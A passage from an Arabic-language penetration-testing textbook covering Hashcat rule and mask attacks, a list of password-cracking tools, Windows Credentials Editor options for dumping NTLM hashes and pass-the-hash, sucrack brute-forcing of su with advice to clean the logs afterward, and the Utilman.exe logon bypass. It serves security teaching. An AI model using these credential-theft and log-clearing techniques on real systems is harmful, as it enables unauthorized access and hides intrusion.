‫ﻧﺟد اﻧﮫ اﺧذ ﻣﻘدار ﻣن اﻟوﻗت ﯾﻌﺎدل ‪ 11‬دﻗﯾﻘﮫ وﻗﺎم ھﻧﺎ ﺑﻛﺳر ﺛﻼﺛﺔ ﻣن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﻣن أﺻل ﺧﻣﺳﮫ وﻟﻛن ﻧﻼﺣظ اﻧﮫ‬ ‫‪-‬‬
‫ﻣﺎزال ھﻧﺎك اﺛﻧﯾن ﻣن اﻟﮭﺎش ﻟم ﯾﺗم ﻛﺳرھﻣﺎ ﺣﺗﻰ اﻻن‪.‬‬

‫‪ -‬ﻟذﻟك ﺳوف ﻧﺳﺗﺧدم ﺗﻘﻧﯾﺎت ﻣﺗﻘدﻣﺔ‪.‬‬


‫‪More advanced cracking‬‬
‫ﺑﻣﺟرد اﺳﺗﺧدام ﻣﻠف اﻟﻘﺎﻣوس ﺿد ﻗﺎﺋﻣﺔ اﻟﮭﺎش ﻓﺎن ﺗﻘوم ﺑﺎﺳﺗﻌﺎدة ﺑﻌض ﻣن أﺳﮭل ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬وﻟﻛن اﻟﺣﺻول ﻋﻠﻰ اﻷﺻﻌب ﻣﻧﮭﺎ ﺗﺣﺗﺎج‬
‫اﻟﻰ ﺗﻘﻧﯾﺎت أﻛﺛر ﺗﻘدﻣﺎ‪ .‬واﻟﺗﻲ ﺳوف ﻧﻐطﯾﮭﺎ اﻻن‪ Hashcat ،‬ﯾﺗﯾﺢ ﻟك اﺳﺗﺧدام أﻧواع ﻣﺗﻌددة ﻣن اﻟﮭﺟوم‪:‬‬
‫‪Multiple Wordlists‬‬
‫‪Rule Sets‬‬
‫‪Password Masks.‬‬
‫‪ -1‬ﻧوع اﻟﮭﺟوم )‪ (Attack type‬ﺣﯾث ﯾﺗﯾﺢ اﺳﺗﺧدام اﻟﺧﯾﺎر )‪ (-a‬ﻟﺗﺣدﯾد ﻧوع اﻟﮭﺟوم اﻟﻣﺳﺗﺧدم ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﻣن ﺧﻼل‬
‫اﻟﺧﯾﺎرات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫ﻣﻌظﻣﮭﺎ ﻻ ﺗﺣﺗﺎج إﻟﻰ ﺷرح‪ Combination Attack .‬ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﺟﻣﻊ ﺑﯾن ﻛﻠﻣﺎت ﻣن اﻟﻘواﻣﯾس ﻹﻧﺷﺎء ﻛﻠﻣﺎت ﺟدﯾدة‪.‬‬
‫‪Rule based attacks -2‬‬
‫ھﻲ ﻣﻔﯾدة ﺟدا ‪ .‬ﺣﯾث ﯾﻣﻠك ‪ hashcat‬ﻗﺎﺋﻣﺔ ﻣن اﻟﻘواﻋد اﻟﺗﻲ ﺑﻧﯾت واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ھﻧﺎك ﻗﺎﻋدة‬
‫"‪ "leet‬وھﻲ ﻣﺟﻣوﻋﺔ اﻟﻘواﻋد اﻟﺗﻲ ﺗﺄﺧذ ﻛل ﻛﻠﻣﺎت اﻟﻘﺎﻣوس ﺗﻠﻘﺎﺋﯾﺎ وﺗﺣﺎول اﺻدار ﻣﺧﺗﻠف ﻣن اﻟﻛﻠﻣﺎت ‪ .leet-speak versions‬ﯾﻣﻛﻧك‬
‫اﯾﺿﺎ اﺳﺗﺧدام ‪ Rule based attack‬ﻣﺛل ﻟﻐﺎت اﻟﺑرﻣﺟﺔ ﻹﻧﺷﺎء ‪ rulesets‬اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﯾﺗم ﺗﻣﻛﯾن ھذا اﻟﻧوع ﻣن اﻟﮭﺟﻣﺎت ﺑﺎﺳﺗﺧدام اﻟﺗﻌﺑﯾر‬
‫)‪ (-r‬ﺛم اﺳم ‪ rules‬اﻟﺗﻲ ﺗرﯾدھﺎ‪.‬‬
‫ﻣن أﺷﮭر ھذه ‪ rules‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪Best64.rule, passwordspro.rule, d3ad0ne.rule, and leetspeak.rule‬‬
‫ﯾﻣﻛﻧك أﯾﺿﺎ اﻻطﻼع ﻋﻠﻰ ﻣزﯾد ﻣن اﻟﻘواﻋد ﻣن ﺧﻼل زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://hashcat.net/wiki/doku.php?id=rule_based_attack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪384‬‬

‫‪Mask attacks -3‬‬


‫ﺗﺳﻣﺢ ﻟك ﺑﺗﺣدﯾد ﺗﺧطﯾط اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺳﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻓﻲ اﻟﮭﺟوم اﻟﺧﺎص ﺑك‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل إذا ﻛﻧت ﺗﻌرف أن ﻧﮭﺞ ﻛﻠﻣﺔ اﻟﻣرور ﯾﺗطﻠب‬
‫رﻗﻣﯾن وﺳﺗﺔ أﺣرف ﻛﺑﯾرة واﺛﻧﯾن ﻣن اﻷﺣرف اﻟﺧﺎﺻﺔ‪ .‬وﯾﺗم ذﻟك ﺑﺈﻧﺷﺎء ‪ MASK‬ل‪ Hashcat‬ﻟﻼﺳﺗﺧدام ﺣﯾث ﯾﻛون ﺷﻛﻠﮫ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪?d?d?u?u?u?u?u?u?s?s‬‬

‫ﯾﺳﺗﺧدم ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻣﻊ ‪ Brute force attack‬وﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﮫ ﺑﺎﻟرﻣوز اﻟﺗﻘﻠﯾدﯾﺔ )‪(Charset‬اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻊ ‪:Mask attack‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ ﺗﺧﺻﯾص ھذه اﻟرﻣوز )‪ .(Charset‬ﻟﺗﺣدﯾد ﻣﺟﻣوﻋﺔ اﻻﺣرف اﻟﺗﻲ ﺗرﯾد ﺗﺧﺻﯾﺻﮭﺎ )‪ ،(custom charset‬ﻓﻧﺣن ﺑﺣﺎﺟﮫ‬
‫ﻻﺳﺗﺧدام اﻟﺧﯾﺎر)‪ .(-1‬ﺣﯾث ﯾﻣﻛﻧك اﺳﺗﺧدام اﻟﻌدﯾد ﻣن ﺗﺧﺻﯾص اﻻﺣرف )‪ (custom charset‬ﻛﻣﺎ ﺗرﯾد طﺎﻟﻣﺎ ﺗم ﺗﺣدﯾدھﺎ ﻣﻊ اﻟﻌدد )‪.(1-n‬‬
‫ﯾﺗم ﺗﻣﺛﯾل ﻛل ﺣرف ﻣﺧﺻص ﺑﺎﻟﻌﻼﻣﺔ اﻻﺳﺗﻔﮭﺎم )؟( وﯾﺗﺑﻌﮫ ﻧوع اﻟﺣرف‪.‬‬

‫أﻣﺛﻠﮫ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


385

OclHashcat
‫ﺗدﻋم اﻟﺗوﻗف‬-‫ﺗدﻋم ﻛروت اﻟﺷﺎﺷﺔ اﻟﻣﺧﺗﻠﻔﺔ‬- ‫ﺗدﻋم اﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﻣﺧﺗﻠﻔﺔ‬- ‫ ﻣﺟﺎﻧﯾﺔ‬:‫ﻣن اﻗوى وأﺳرع اﻷدوات ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻷﻧﮭﺎ‬
.‫ ﻧوﻋﺎ ﻣن اﻧواع اﻟﮭﺎش‬50 ‫ﺗدﻋم أﻛﺛر ﻣن‬- ‫ﺗدﻋم أﻛﺛر ﻣن طرﯾﻘﺔ ھﺟوم‬-‫واﻻﺳﺗﻣرار‬

‫ ﺑﺎﻹﺿﺎﻓﺔ اﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل‬.GPU ‫ وﻟﻛﻧﮭﺎ ﺗﺧﺗﻠف ﻋﻧﮭﺎ ﺑﺗدﻋﯾﻣﮭﺎ اﺳﺗﺧدام‬hashcat ‫ﺗﺳﺗﺧدم ﻧﻔس اﻟﺧﯾﺎرات اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻊ اﻷداة‬
.‫وﯾﻧدوز ﺑﺟﺎﻧب اﻟﻠﯾﻧﻛس‬

Other Password Cracking Tools

،‫ ﻣﺳؤول اﻟدوﻣﯾن‬،‫أدوات ﻛﺳر ﻛﻠﻣﺔ ﻣرور ﺗﺳﻣﺢ ﻟك ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺎت ﻣرور ﻟﻣﺳؤول ﻏﯾر ﻣﻌروف أو ﺗم ﻓﻘداﻧﮭﺎ ﻋﻠﻰ اﻟﻣﺳﺗوى اﻟﻣﺣﻠﻲ‬
‫ ﺣﺗﻰ أﻧﮫ ﯾﺳﻣﺢ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻟﻠوﺻول إﻟﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم اﻟﻣؤﻣن ﻋﻠﻰ اﻟﻔور دون‬.‫وﻏﯾرھﺎ ﻣن ﻛﻠﻣﺎت ﻣرور ﺣﺳﺎب اﻟﻣﺳﺗﺧدم‬
:‫ وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‬.‫ ﻓﻲ ﺣﺎﻟﺔ ﻧﺳﯾﺎن ﻛﻠﻣﺔ اﻟﺳر‬،‫إﻋﺎدة ﺗﺛﺑﯾت وﯾﻧدوز‬
Password Unlocker Bundle available at http://www.passwordunlocker.com
Proactive System Password Recovery available at http://www.elcomsoft.com
Windows Password Cracker available at http://www.windows-password-cracker.com
WinPassword available at http://lastbit.com/
Passware Kit Enterprise available at http://www.lostpassword.com
PasswordsPro available at http://www.insidepro.com
LSASecretsView available at http://www.nirsoft.net
LCP available at http://www.lcpsoft.com
Password Cracker available at http://www.amlpages.com
Kon-Boot available at http://www.thelead82.com
Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com
Hash Suite available at http://hashsuite.openwall.net
SAMlnside available at http://www.insidepro.com
Windows Password Recovery available at http://www.passcape.com
Password Recovery Bundle available at http://www.top-password.com

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪386‬‬

‫‪Krbpwguess available at http://www.cqure.net‬‬


‫‪Windows Password Breaker Enterprise available at http://www.recoverwindowspassword.com‬‬
‫‪Rekevsoft Windows Password Recovery Enterprise available at http://www.rekeysoft.com‬‬

‫ﺑﻌض اﻟﺗﻘﻧﯾﺎت اﻷﺧرى ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‬

‫)‪Windows Credentials Editor (WCE‬‬


‫اﻟﻣﺻدر‪http://www.ampliasecurity.com/research/windows-credentials-editor :‬‬
‫)‪ Windows Credentials Editor (WCE‬ھﻲ أداة أﻣﻧﯾﺔ ﻟﺳرد ﺟﻠﺳﺎت ﺗﺳﺟﯾل اﻟدﺧول وإﺿﺎﻓﺔ أو ﺗﻐﯾﯾر اﻟﻘﺎﺋﻣﺔ وﺣذف ﺑﯾﺎﻧﺎت‬
‫اﻻﻋﺗﻣﺎد اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ )ﻣﺛﻼ‪ :‬ھﺎش ‪ ،LM / NT‬ﻛﻠﻣﺎت اﻟﺳر اﻟﻐﯾر ﻣﺷﻔرة وﺗذاﻛر ‪ .(kerberos‬ھذه اﻷداة ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ‪ ،‬ﻋﻠﻰ ﺳﺑﯾل‬
‫اﻟﻣﺛﺎل‪ ،‬ﻷداء ﺗﻣرﯾر اﻟﮭﺎش )‪ (pass the hash‬ﻋﻠﻰ وﯾﻧدوز‪ ،‬ﻋن طرﯾﻖ اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش ‪ NT/LM‬ﻣن اﻟذاﻛرة )ﻣن ﺗﺳﺟﯾﻼت دﺧول‬
‫اﻟﺗﻔﺎﻋﻠﯾﺔ‪ ،‬واﻟﺧدﻣﺎت‪ ،‬اﺗﺻﺎﻻت ﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد‪ ،‬اﻟﺦ(‪ ،‬واﻟﺣﺻول ﻋﻠﻰ ﺗذاﻛر ‪ Kerberos‬وإﻋﺎدة اﺳﺗﺧداﻣﮭﺎ ﻓﻲ ﻧظﺎم وﯾﻧدوز أﺧر أو‬
‫ﻧﺎظم ﯾوﻧﻛس‪ ،‬وﺗﻔرﯾﻎ ﻧص ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺈدﺧﺎﻟﮭﺎ ﻋﻧد ﺗﺳﺟﯾل اﻟدﺧول‪ WCE .‬ھو أداة أﻣﻧﯾﺔ ﺗﺳﺗﺧدم ﻋﻠﻰ ﻧطﺎق واﺳﻊ‬
‫ﻣن ﻗﺑل اﻟﻣﺗﺧﺻﺻﯾن ﻓﻲ ﻣﺟﺎل اﻷﻣن ﻟﺗﻘﯾﯾم أﻣن ﺷﺑﻛﺎت وﯾﻧدوز ﻋن طرﯾﻖ اﺧﺗﺑﺎر اﻻﺧﺗراق‪ .‬وھﻲ ﺗدﻋم وﯾﻧدوز إﻛس ﺑﻲ‪ ،2003 ،‬ﻓﯾﺳﺗﺎ‪،7 ،‬‬
‫‪ 2008‬وﯾﻧدوز ‪.8‬‬

‫ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﺑواﺳطﺔ ﻣﮭﺎﺟم ذات اﻟﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن طرﯾﻖ ﺣﻘﻧﮭﺎ ﻓﻲ ﻧظﺎم اﻟوﯾﻧدوز اﻟﮭدف ﺑواﺳطﺔ‬
‫‪ meterpreter‬ﻛﻣﺎ ﻓﻌﻠﻧﺎ ﺳﺎﺑﻘﺎ ﻣﻊ ‪.hashdump7‬‬
‫ﯾوﺟد ﻧﺳﺧﮫ ﻣن ھذا اﻟﻣﻠف ﻓﻲ اﻟﻣﺳﺎر ‪ /usr/share/wce‬واﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪.‬‬
‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﮫ ﻛﺎﻻﺗﻰ‪:‬‬
‫]‪C:\cwe\> cwe.exe [options‬‬
‫ﻣﺛﺎل‪:‬‬

‫اﻟﺧﯾﺎرات اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻌﮫ ﻛﺎﻻﺗﻰ‪:‬‬


‫ﯾﺟب ان ﻧﻼﺣظ ان ھذه اﻷداة ﺗﺷﺑﮫ ‪ mimikatz‬ﺣﯾث ﺗﺗﻌﺎﻣل ﻓﻲ ﻣﻌظﻣﮭﺎ ﻣﻊ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﺗﺳﺟﯾﻠﮭﺎ ﻓﻲ اﻟذاﻛرة‬
‫‪-l‬‬ ‫‪List logon sessions and NTLM credentials (default).‬‬
‫ﯾﺳﺗﺧدم ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن ﻗﺎم ﺑﺗﺳﺟﯾل اﻟدﺧول ﻓﻲ اﻟوﯾﻧدوز واﻟﮭﺎش اﻟﺧﺎص ﺑﮫ وھذا ھو اﻟوﺿﻊ اﻻﻓﺗراﺿﻲ ﻋﻧد اﺳﺗﺧدام ‪ wce‬ﺑدون أي‬
‫ﺗﻌﺑﯾرات‪.‬‬
‫‪-s‬‬ ‫‪Change NTLM credentials of current logon session.‬‬
‫ﯾﻘوم ﺑﺗﻐﯾر ھﺎش ‪ NTLM‬ﻓﻲ ﺑﯾﺎﻧﺎت ﻣﺳﺗﺧدم ﻣﻌﯾن ﻣﻣن ﻗﺎم ﺑﺗﺳﺟﯾل اﻟدﺧول او اﻋداد ﺑﯾﺎﻧﺎت ﺟدﯾده‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪387‬‬

‫‪-r‬‬ ‫‪List logon sessions and NTLM credentials indefinitely. Refresh every 5 seconds if new sessions.‬‬
‫ﺗﺳﺗﺧدم ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن ﻗﺎم ﺑﺗﺳﺟﯾل اﻟدﺧول ﻓﻲ اﻟوﯾﻧدوز واﻟﮭﺎش اﻟﺧﺎص ﺑﮫ‪ .‬ﺛم ﺗﻘوم ﺑﻌﻣل ﻓﺣص ﻛل ‪ 5‬ﺛواﻧﻲ ﻟﺗﺳﺟﯾل أي ﺟﻠﺳﺔ دﺧول‬
‫ﺟدﯾده‪.‬‬
‫‪-c‬‬ ‫‪Run in a new session with the specified NTLM credentials.‬‬
‫اﻧﺷﺎء ﺟﻠﺳﺔ ﺟدﯾده ﻣﻊ ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ھﺎش ﻣﻌﯾن‪.‬‬
‫‪-e‬‬ ‫‪List logon sessions NTLM credentials indefinitely. Refresh every time a logon event occurs.‬‬
‫ﻣﺛل اﻟﺧﯾﺎر )‪ (-r‬وﻟﻛن ﯾﺗم إﻋﺎدة اﻟﻔﺣص ﻛﻠﻣﺎ ﻧﺷﺎء ﺗﺳﺟﯾل دﺧول ﺟدﯾد‪.‬‬
‫>‪-o <file‬‬ ‫‪save all output to a file.‬‬
‫ﻹﻧﺷﺎء ھﺎش ﻣن اﻟﻧوع ‪ NTLM‬ﻟﻛﻣﻠﺔ ﻣرور ﻣﻌﯾﻧﮫ ﯾﺗم ذﻟك ﻋن طرﯾﻖ اﻻﺗﻲ‪:‬‬
‫>‪wce.exe -g <cleartext password‬‬
‫‪For example:‬‬
‫‪C:\Users\test>wce.exe -g mypassword‬‬
‫‪WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa‬‬
‫)‪(hernan@ampliasecurity.com‬‬
‫‪Use -h for help.‬‬
‫‪Password: mypassword‬‬
‫‪Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7‬‬

‫‪CmosPwd‬‬
‫ﯾﺳﺗﺧدم ‪ CmosPwd‬ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور ‪ CmosPwd .(Basic Input Output System)BIOS‬ﯾﺗﯾﺢ ﻟك ﻣﺣو‪/‬ﻗﺗل‪ ،‬اﻟﻧﺳﺦ‬
‫اﻻﺣﺗﯾﺎطﻲ‪ ،‬او اﺳﺗﻌﺎدة ‪.CMOS‬‬

‫‪Physical access attacks with sucrack‬‬


‫ﻓﻲ ھﺬه اﻟﺠﺰء‪ ،‬ﺳﻮف ﻧﺴﺘﺨﺪم ‪ SUCrack‬ﻟﺘﻨﻔﯿﺬ ھﺠﻮم اﻟﻮﺻﻮل اﻟﻤﺎدي ﻟﻜﻠﻤﺔ اﻟﻤﺮور)‪. (Physical access password attacks‬‬
‫‪ SUCrack‬ھﻲ أداة ﻣﺘﻌﺪدة اﻟﻌﻤﻠﯿﺎت )‪ (multi threat‬واﻟﺘﻲ ﺗﺴﻤﺢ ﺑﮭﺠﻮم اﻟﻘﻮة اﻟﻐﺎﺷﻤﺔ )‪ (brute force attack‬ﻟﻜﺴﺮ ﺣﺴﺎﺑﺎت‬
‫اﻟﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﻤﺤﻠﯿﺔ ﻋﺒﺮ اﻻﻣﺮ ‪ .su‬اﻷﻣﺮ ‪ su‬ﻓﻲ ﻟﯿﻨﻜﺲ ﺗﺴﻤﺢ ﻟﻚ ﻟﺘﺸﻐﯿﻞ اﻷواﻣﺮ ﻛﻤﺴﺘﺨﺪم ﺑﺪﯾﻞ‪ .‬ھﺬا اﻟﮭﺠﻮم‪ ،‬ﻋﻠﻰ اﻟﺮﻏﻢ ﻣﻦ اﻧﮫ ﻣﻔﯿﺪ ﻋﻨﺪﻣﺎ‬
‫ﺗﻜﻮن ﻏﯿﺮ ﻗﺎدر ﻋﻠﻰ ﺗﺼﻌﯿﺪ اﻻﻣﺘﯿﺎزات ﻋﻠﻰ ﻧﻈﺎم ﻟﯿﻨﻜﺲ‪/‬ﯾﻮﻧﻜﺲ‪ ،‬وﻟﻜﻨﮫ ﺳﻮف ﯾﻤﻸ ﻣﻠﻔﺎت اﻟﺴﺠﻞ ﺑﺴﺮﻋﺔ ﻓﻠﺬا ﯾﺮﺟﻰ اﻟﺘﺄﻛﺪ ﻣﻦ ﺗﻨﻈﯿﻒ ﻣﻠﻔﺎت‬
‫اﻟﺴﺠﻞ ﺑﻌﺪ اﻻﻧﺘﮭﺎء ‪. SUCrack‬ﻟﺪﯾﮫ ﻋﺪة ﺧﯿﺎرات واﻟﺘﻲ ﯾﻤﻜﻨﻨﺎ اﺳﺘﺨﺪاﻣﮭﺎ‪:‬‬
‫)‪ (--help‬ﯾﺴﻤﺢ ﻟﻚ ﻟﻌﺮض ﻣﻠﻒ اﻟﻤﺴﺎﻋﺪة ل‪.SUCrack‬‬
‫)‪ (-l‬ﯾﺴﻤﺢ ﻟﻚ ﺑﺘﻐﯿﯿﺮ اﻟﻤﺴﺘﺨﺪم اﻟﺬي ﻗﺎم ﺑﺘﺴﺠﯿﻞ اﻟﺪﺧﻮل وﻧﺤﻦ ﻧﺤﺎول اﻻﻟﺘﻔﺎف ﻋﻠﯿﮫ‪.‬‬
‫)‪ (-s‬ﯾﺴﻤﺢ ﻟﻚ ﻟﺘﻌﯿﯿﻦ ﻋﺪد اﻟﺜﻮاﻧﻲ واﻟﺬى ﻋﻨﺪھﺎ ﯾﺘﻢ ﻋﺮض اﻹﺣﺼﺎءات‪ .‬اﻟﻌﺪد اﻻﻓﺘﺮاﺿﻲ ‪ 3‬ﺛﻮاﻧﻲ‪.‬‬
‫)‪ (-a‬ﯾﺴﻤﺢ ﻟﻚ ﻟﺘﺤﺪﯾﺪ ﻣﺎ إذا ﻛﺎﻧﺖ رﻣﻮز ‪ ANSI escape‬ﯾﻨﺒﻐﻲ أن ﺗﺴﺘﺨﺪم أم ﻻ‪.‬‬
‫)‪ (-w‬ﯾﺴﻤﺢ ﻟﻚ ﻟﺘﺤﺪﯾﺪ ﻋﺪد اﻟﻌﻤﻠﯿﺎت اﻟﺘﻲ ﯾﻤﻜﻦ ان ﯾﺴﺘﺨﺪﻣﮭﺎ ‪.SUCrack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪388‬‬

‫‪ SUCrack‬ﯾﻤﻜﻨﮫ إدارة اﻟﻌﺪﯾﺪ ﻣﻦ اﻟﻌﻤﻠﯿﺎت ﻓﻲ وﻗﺖ واﺣﺪ‪ ,‬وﻟﻜﻦ ﯾﻔﻀﻞ اﺳﺘﺨﺪام واﺣﺪ ﻓﻘﻂ ﺣﯿﺚ ﻛﻠﻤﺎ ﻓﺸﻠﺖ ﻣﺤﺎوﻟﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻓﻌﺎدة ﻣﺎ‬
‫ﯾﺘﺴﺒﺐ ﺗﺄﺧﯿﺮ ﺛﻼﺛﺔ ﺛﻮاﻧﻲ ﻗﺒﻞ ﻣﺤﺎوﻟﺔ إدﺧﺎل ﻛﻠﻤﺔ ﻣﺮور أﺧﺮى‪.‬‬
‫ﻛﯿﻒ ﻧﻔﻌﻞ ذﻟﻚ ‪...‬‬
‫‪ -1‬ﻣﻦ اﺟﻞ اﺳﺘﺨﺪام‪ ، SUCrack‬ﯾﺠﺐ ﻋﻠﯿﻚ ﺗﺤﺪﯾﺪ ﻟﻮاﺋﺢ اﻟﻜﻠﻤﺎت ﻋﻨﺪ ﻓﺘﺤﮫ‪ .‬ﺧﻼف ذﻟﻚ‪ ،‬ﺳﻮف ﺗﺤﺼﻞ ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻄﺎ‪ .‬ﻓﺘﺢ ﻧﺎﻓﺬة‬
‫اﻟﺘﺮﻣﻨﺎل وﺗﻨﻔﯿﺬ اﻷﻣﺮ‪ sucrack‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#sucrack /usr/share/wordlists/rockyou.txt‬‬
‫‪ -2‬إذا ﻛﻨﺖ ﺗﺮﻏﺐ ﻓﻲ ﺟﻌﻞ ‪ sucrack‬ﯾﻘﻮم ﺑﻌﻤﻠﯿﺘﯿﻦ ﻓﻲ وﻗﺖ واﺣﺪ‪ ،‬وﺗﺮﻏﺐ ﻓﻲ ﻋﺮض اﻻﺣﺼﺎءات ﻛﻞ ‪ 6‬ﺛﻮان‪ ،‬وﺗﺮﻏﺐ ﻓﻲ ﺗﻌﯿﯿﻦ‬
‫رﻣﻮز ‪ANSI escape‬ﻻﺳﺘﺨﺪاﻣﮭﺎ‪ ،‬ﯾﻤﻜﻨﻚ اﺳﺘﺨﺪام اﻷﻣﺮ اﻟﺘﺎﻟﻲ‪:‬‬
‫‪#sucrack –w 2 –s 6 –a /usr/share/wordlists/rockyou.txt‬‬

‫‪Bypass Windows Logons with the Utilman.exe Trick‬‬


‫‪Utilman.exe‬ﺗﻄﺒﯿﻖ ﺗﻢ ﺑﻨﺎﺋﮫ ﻓﻲ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز‪ ,‬وﺗﻢ ﺗﺼﻤﯿﻤﮫ ﻟﻠﺴﻤﺎح ﻟﻠﻤﺴﺘﺨﺪم ﺑﺘﻜﻮﯾﻦ ﺧﯿﺎرات اﻟﻮﺻﻮل ﻣﺜﻞ ﻣﻜﺒﺮ اﻟﺸﺎﺷﺔ‬
‫)‪ ، (Magnifier‬وﻧﺴﻖ اﻟﺘﺒﺎﯾﻦ اﻟﻌﺎﻟﻲ )‪ ، (High Contrast Theme‬و ‪ ،Narrator‬وﻟﻮﺣﺔ اﻟﻤﻔﺎﺗﯿﺢ ﻋﻠﻰ اﻟﺸﺎﺷﺔ )‪(On Screen Keyboard‬‬
‫ﻗﺒﻞ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ اﻟﻨﻈﺎم‪.‬‬
‫ﺗﻢ ﺗﺼﻤﯿﻢ ھﺬا ﻟﻤﺴﺎﻋﺪة اﻟﻨﺎس اﻟﺬﯾﻦ ھﻢ ﺿﻌﺎف اﻟﺒﺼﺮ أو اﻟﺴﻤﻊ او اﻟﺤﺮﻛﺔ ﻓﻲ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ ‪ Windows‬ﺑﺄﻧﻔﺴﮭﻢ دون اﻟﺤﺎﺟﺔ ﻟﻠﻤﺴﺎﻋﺪة‬
‫ﻣﻦ اﻟﺨﺎرج‪ .‬ﻟﮭﺎ ﻣﯿﺰة ﻛﺒﯿﺮة ﻟﻸﺷﺨﺎص ذوي اﻹﻋﺎﻗﺔ وﻟﻜﻨﮫ ﯾﻔﺘﺢ ﺛﻐﺮة أﻣﻨﯿﺔ ﯾﻤﻜﻦ ﻟﻨﺎ أن ﻧﺴﺘﻔﯿﺪ ﻣﻨﮭﺎ ﻣﻦ ﺧﻼل ﺗﺠﺎوز ﻋﻤﻠﯿﺎت ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل‬
‫إﻟﻰ اﻟﻮﯾﻨﺪوز‪.‬‬

‫ﺗﺠﺎوز ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ ‪ Windows‬ﺗﺄﺗﻲ ﻓﻲ ﻣﺘﻨﺎول اﻟﯿﺪﯾﻦ إذا ان ﻋﻤﻼﺋﻨﺎ ﻗﺪ ﻧﺴﻮا ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺨﺎﺻﺔ ﺑﮭﻢ ﻟﺘﺴﺠﯿﻞ اﻟﺪﺧﻮل أو ﺗﻢ ﺗﻠﻒ‬
‫ﻣﻠﻔﺎت ﺗﻌﺮﯾﻒ اﻟﻤﺴﺘﺨﺪم اﻟﺨﺎﺻﺔ ﺑﮭﻢ أو ﯾﻮﺟﺪ ﺗﺪﺧﻞ ﻣﻦ اﻟﺘﻄﺒﯿﻘﺎت اﻟﺨﺒﯿﺜﺔ )‪(malware‬ﻣﻊ اﻟﻨﻈﺎم ﻗﺒﻞ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل‪.‬‬
